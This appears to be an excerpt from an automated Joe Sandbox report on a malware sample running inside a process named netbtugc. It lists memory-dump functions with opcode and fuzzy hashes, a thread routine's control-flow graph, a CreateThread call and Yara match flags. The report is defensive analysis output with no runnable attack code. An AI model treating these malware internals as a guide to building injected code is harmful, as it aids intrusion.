                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: cc2d49764522b8694f58200df0b3fc424a917acfa575da058a67899638806734
                                                                                                  • Instruction ID: f8d607286be30c0b5e9644f09137e543516a42302b62043b85c001783350007d
                                                                                                  • Opcode Fuzzy Hash: cc2d49764522b8694f58200df0b3fc424a917acfa575da058a67899638806734
                                                                                                  • Instruction Fuzzy Hash: 4790023521104C02E5C0B158450464A000597D1301F91C41EA0025A94DCB358A5977B5
                                                                                                  Function 034B2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 89f119038f30c97a25d962b5a602b50748b7d0f922e4b7f002fb65a47aaad442
                                                                                                  • Instruction ID: f2ebb90c5cb96c1537c867e4b73ff9b426d284efb36cfafe27218e4112cd454a
                                                                                                  • Opcode Fuzzy Hash: 89f119038f30c97a25d962b5a602b50748b7d0f922e4b7f002fb65a47aaad442
                                                                                                  • Instruction Fuzzy Hash: 1F90023521104802E540A5985508646000597E0301F51D41AA5024995EC77588917135
                                                                                                  Function 034B2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 15cf22959ff4e060333170fbb948792957e5225fcd70d121ce5d37c25fe859a4
                                                                                                  • Instruction ID: eb0bf681e66fa6b9a67e00fb06c7adcc060f70c0a3ade407e81381267117a536
                                                                                                  • Opcode Fuzzy Hash: 15cf22959ff4e060333170fbb948792957e5225fcd70d121ce5d37c25fe859a4
                                                                                                  • Instruction Fuzzy Hash: 3090023521104C42E540A1584504B46000597E0301F51C41FA0124A94DC735C8517535
                                                                                                  Function 034B2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 1187f32479e9b70c9178475bb1dd6ca9d97efc2c00098964379dd8f06ac1ac46
                                                                                                  • Instruction ID: 9949ce077a07979b0f48b7524535e219aa4b5aa364788951762f32ba01976bfa
                                                                                                  • Opcode Fuzzy Hash: 1187f32479e9b70c9178475bb1dd6ca9d97efc2c00098964379dd8f06ac1ac46
                                                                                                  • Instruction Fuzzy Hash: 6A9002352110CC02E550A158850474A000597D0301F55C81AA4424A98DC7B588917135
                                                                                                  Function 034B2A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 801a67fb041737a31955be7f0f1bfab1200a58350111ba6099d98d96cdfb2091
                                                                                                  • Instruction ID: 92d99fa997dd32f7ffa8c19fcf5e5ebf737f3470cdc07b194a10c12c80b664e5
                                                                                                  • Opcode Fuzzy Hash: 801a67fb041737a31955be7f0f1bfab1200a58350111ba6099d98d96cdfb2091
                                                                                                  • Instruction Fuzzy Hash: 14900229231044021585E558070450B0445A7D6351391C41EF14169D0CC73188656335
                                                                                                  Function 034B2AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: d198fccb7d3c339c01eceaea77cb739ffe8c9aee0d943bee2c070b9dc8ab8dda
                                                                                                  • Instruction ID: 67d9c3c8b0d05b19d56dffe3891bd651772954a8933e5cc19fe3690477f1caf2
                                                                                                  • Opcode Fuzzy Hash: d198fccb7d3c339c01eceaea77cb739ffe8c9aee0d943bee2c070b9dc8ab8dda
                                                                                                  • Instruction Fuzzy Hash: 3590023561504C02E590B1584514746000597D0301F51C41AA0024A94DC7758A5576B5
                                                                                                  Function 034B2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: f78dda341be770c69eff68e70471868098b0cddd16da4ee4692f0c12f9273c77
                                                                                                  • Instruction ID: 7ac61e73168387e0ae6e50eaf2e9c0ff413e01ad58ad0274a7884e5e00d41ad9
                                                                                                  • Opcode Fuzzy Hash: f78dda341be770c69eff68e70471868098b0cddd16da4ee4692f0c12f9273c77
                                                                                                  • Instruction Fuzzy Hash: 55900265212044035545B1584514616400A97E0201B51C42AE10149D0DC73588917139
                                                                                                  Function 034B29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 643be7b3a206836e147d755dcb5ae3df995f8bf9945178842dd25b65b0bde3c6
                                                                                                  • Instruction ID: 863bdc474a3c3e89bd29f86aa01758a4fefba76cb18a7a606e9bb3499f093709
                                                                                                  • Opcode Fuzzy Hash: 643be7b3a206836e147d755dcb5ae3df995f8bf9945178842dd25b65b0bde3c6
                                                                                                  • Instruction Fuzzy Hash: 42900229221044031545E5580704507004697D5351351C42AF1015990CD73188616135
                                                                                                  Function 034B2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 05ed03debc5136bffea1bdd7b2b248c11b28b8a4f5b875c9d902de5566599de2
                                                                                                  • Instruction ID: 6d7dedd923f8b8e05ecac99feaecbc8b31566f9edec2cbadfcd8f8a21bce21d0
                                                                                                  • Opcode Fuzzy Hash: 05ed03debc5136bffea1bdd7b2b248c11b28b8a4f5b875c9d902de5566599de2
                                                                                                  • Instruction Fuzzy Hash: 4090022522184442E640A5684D14B07000597D0303F51C51EA0154994CCB3588616535
                                                                                                  Function 034B2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: bf18e75ffde783f21621d34eb94e14035db0c7e9dfec16ad0f2817528c2379be
                                                                                                  • Instruction ID: 5a05d5ea2c44fc2b0177b1264cfb309bff4ca7ef150246e9d5ef4715007ee6cb
                                                                                                  • Opcode Fuzzy Hash: bf18e75ffde783f21621d34eb94e14035db0c7e9dfec16ad0f2817528c2379be
                                                                                                  • Instruction Fuzzy Hash: C190026535104842E540A1584514B060005D7E1301F51C41EE1064994DC739CC52713A
                                                                                                  Function 034B2E00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 3c8c3387852ea1aa17cca153d03291839db23894fd08675a09245c5bbd617482
                                                                                                  • Instruction ID: 1284f32a6c39f00edbb9206070c74c8319bcf2b7d4e55afea3c0900198d8ba2c
                                                                                                  • Opcode Fuzzy Hash: 3c8c3387852ea1aa17cca153d03291839db23894fd08675a09245c5bbd617482
                                                                                                  • Instruction Fuzzy Hash: C090026521144803E580A5584904607000597D0302F51C41AA2064995ECB398C517139
                                                                                                  Function 034B2ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 499aeab2489b73d43817590f7b49ef189df1d03d8931babeba3253e9af9d2d77
                                                                                                  • Instruction ID: 9ac3cbd383ae123a31f13c732a83a93777c55ebfec4fdaf39ab1e1399f18fb53
                                                                                                  • Opcode Fuzzy Hash: 499aeab2489b73d43817590f7b49ef189df1d03d8931babeba3253e9af9d2d77
                                                                                                  • Instruction Fuzzy Hash: BA900225611044425580B16889449064005BBE1211751C52AA0998990DC77988656679
                                                                                                  Function 034B2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 4534536de5bf3875cdbb5986060a6c6889fa67a0eb30ac9c2bb1a3106db944e9
                                                                                                  • Instruction ID: 807ca8132be87c901540979256d9206f90aeadeb53c83fd398544c4209d3e50b
                                                                                                  • Opcode Fuzzy Hash: 4534536de5bf3875cdbb5986060a6c6889fa67a0eb30ac9c2bb1a3106db944e9
                                                                                                  • Instruction Fuzzy Hash: 9D90023521104813E551A1584604707000997D0241F91C81BA0424998DD7768952B135
                                                                                                  Function 034B2DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: f7aaf8208cd846ecb4e26adb88a9884a9ae497a0e44ecfb7af0d6921568424a3
                                                                                                  • Instruction ID: 74fad0c6a8d5ac9028dc0a8422c1f4959ed7a41c591cf2652a22e3c0f6bca7bf
                                                                                                  • Opcode Fuzzy Hash: f7aaf8208cd846ecb4e26adb88a9884a9ae497a0e44ecfb7af0d6921568424a3
                                                                                                  • Instruction Fuzzy Hash: 2F90022561104902E541B1584504616000A97D0241F91C42BA1024995ECB358992B135
                                                                                                  Function 034B2C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 7ffead0e9363e0c89b684ce28f47c8effef19e0d0ce0ef97f8c1ae78340f28da
                                                                                                  • Instruction ID: 444045574c731ae49b1e929e332596556b1a5553be3f5a2edcb695e1a79e2eaa
                                                                                                  • Opcode Fuzzy Hash: 7ffead0e9363e0c89b684ce28f47c8effef19e0d0ce0ef97f8c1ae78340f28da
                                                                                                  • Instruction Fuzzy Hash: 9390022531104403E580B15855186064005E7E1301F51D41AE0414994CDB3588566236
                                                                                                  Function 034B2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: b002beb74d7dd3a99abe6f76411b9f6fff220c6037b7e5e390fa829589d526da
                                                                                                  • Instruction ID: 15d409966cd088a46cf592a6491fa79f9a3c60c71e2e032183ef332cbe028379
                                                                                                  • Opcode Fuzzy Hash: b002beb74d7dd3a99abe6f76411b9f6fff220c6037b7e5e390fa829589d526da
                                                                                                  • Instruction Fuzzy Hash: 3F90022D22304402E5C0B158550860A000597D1202F91D81EA0015998CCB3588696335
                                                                                                  Function 034B2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 096adf122fc975a6ef33922e6511b1f87b9c7cc4721a6987187d08b3cfba93d0
                                                                                                  • Instruction ID: b0eda6cbb23588ba992c3ac7ed0406f08b908e2f03fc4f90d1397261b5ad8020
                                                                                                  • Opcode Fuzzy Hash: 096adf122fc975a6ef33922e6511b1f87b9c7cc4721a6987187d08b3cfba93d0
                                                                                                  • Instruction Fuzzy Hash: 22900225252085526985F15845045074006A7E0241791C41BA1414D90CC7369856E635
                                                                                                  Function 034B34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: a4d485a09fae05af1297faae6e1d63d6c68108011bc06a5fe57b4667ad7ad291
                                                                                                  • Instruction ID: 4636ca9f53d626bbb9c6ccd2d46f8c061cdb080005e419025f3db3805344148f
                                                                                                  • Opcode Fuzzy Hash: a4d485a09fae05af1297faae6e1d63d6c68108011bc06a5fe57b4667ad7ad291
                                                                                                  • Instruction Fuzzy Hash: 6190023561514802E540A1584614706100597D0201F61C81AA04249A8DC7B5895175B6
                                                                                                  Function 034B38D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 5dff3f5c7f8632c1fc2f8232c465bc4180fd5531bd30aa1d550010bcf8246629
                                                                                                  • Instruction ID: 4782f1c4712880654e317d62a1a522f6cf674b597a8ce8aaf392d711b539515a
                                                                                                  • Opcode Fuzzy Hash: 5dff3f5c7f8632c1fc2f8232c465bc4180fd5531bd30aa1d550010bcf8246629
                                                                                                  • Instruction Fuzzy Hash: 8190022525509502E590B15C45046164005B7E0201F51C42AA08149D4DC77588557235
                                                                                                  Function 02C59ED3 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 111threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 165 2c59ed3-2c59ed9 166 2c59eb7-2c59ecc CreateThread 165->166 167 2c59edb-2c5a174 165->167 168 2c5a17e-2c5a182 167->168 169 2c5a184-2c5a1a1 168->169 170 2c5a1a3-2c5a1aa 168->170 169->168 171 2c5a1b1-2c5a1b8 170->171 172 2c5a1ef 171->172 173 2c5a1ba-2c5a1ed 171->173 174 2c5a1f6-2c5a206 172->174 173->171 174->174 175 2c5a208-2c5a212 174->175 176 2c5a223-2c5a22c 175->176 177 2c5a243-2c5a24a 176->177 178 2c5a22e-2c5a241 176->178 179 2c5a24c-2c5a262 177->179 180 2c5a26f-2c5a278 177->180 178->176 182 2c5a264-2c5a26a 179->182 183 2c5a26d 179->183 184 2c5a5cc-2c5a5d3 180->184 185 2c5a27e-2c5a285 180->185 182->183 183->177 187 2c5a5d5 call 2c7b040 184->187 188 2c5a647-2c5a651 184->188 186 2c5a290-2c5a297 185->186 191 2c5a2d6-2c5a2e0 186->191 192 2c5a299-2c5a2d4 186->192 196 2c5a5da-2c5a5e4 187->196 189 2c5a662-2c5a66b 188->189 193 2c5a682-2c5a68c 189->193 194 2c5a66d-2c5a680 189->194 197 2c5a2f1-2c5a2fa 191->197 192->186 194->189 199 2c5a5f5-2c5a5fc 196->199 200 2c5a310-2c5a323 197->200 201 2c5a2fc-2c5a30e 197->201 203 2c5a61f-2c5a626 199->203 204 2c5a5fe-2c5a61d 199->204 202 2c5a334-2c5a340 200->202 201->197 208 2c5a357-2c5a35e 202->208 209 2c5a342-2c5a355 202->209 203->188 206 2c5a628-2c5a645 203->206 204->199 206->203 211 2c5a360-2c5a388 208->211 212 2c5a38a-2c5a394 208->212 209->202 211->208 213 2c5a3a5-2c5a3af 212->213 214 2c5a3b1-2c5a3fb 213->214 215 2c5a3fd-2c5a407 213->215 214->213 217 2c5a418-2c5a421 215->217 218 2c5a437-2c5a441 217->218 219 2c5a423-2c5a435 217->219 221 2c5a452-2c5a45e 218->221 219->217 222 2c5a460-2c5a46d 221->222 223 2c5a46f-2c5a476 221->223 222->221 225 2c5a4ad-2c5a4b7 223->225 226 2c5a478-2c5a4ab 223->226 227 2c5a4c8-2c5a4d1 225->227 226->223 228 2c5a4d3-2c5a4dc 227->228 229 2c5a4e9-2c5a4f8 227->229 230 2c5a4e7 228->230 231 2c5a4de-2c5a4e4 228->231 232 2c5a53d-2c5a547 229->232 233 2c5a4fa-2c5a501 229->233 230->227 231->230 237 2c5a558-2c5a564 232->237 235 2c5a503-2c5a536 233->235 236 2c5a538 233->236 235->233 236->184 238 2c5a575-2c5a585 237->238 239 2c5a566-2c5a573 237->239 238->238 241 2c5a587-2c5a59b 238->241 239->237 242 2c5a5ac-2c5a5b5 241->242 243 2c5a5c7 242->243 244 2c5a5b7-2c5a5bd 242->244 243->180 245 2c5a5c5 244->245 246 2c5a5bf-2c5a5c2 244->246 245->242 246->245
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C59EC2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID: !$'+$($;a$=5$>P$P_$Q6$]$m!$p$rj$~
                                                                                                  • API String ID: 2422867632-3036813704
                                                                                                  • Opcode ID: 050459c663fac1fd3aa8e65dc7aa5c3fe688db664e4d5ef3f919b58e4b59d686
                                                                                                  • Instruction ID: 528c2d463d011ff0972e493483d6752986157d1735adea9c61d5429f259ebd0a
                                                                                                  • Opcode Fuzzy Hash: 050459c663fac1fd3aa8e65dc7aa5c3fe688db664e4d5ef3f919b58e4b59d686
                                                                                                  • Instruction Fuzzy Hash: CD6156B0D05269CBEB24CF95C9987DEBBB0BB45308F1081D9C1497B681C7BA1A89CF95
                                                                                                  Function 02C60D60 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 212COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
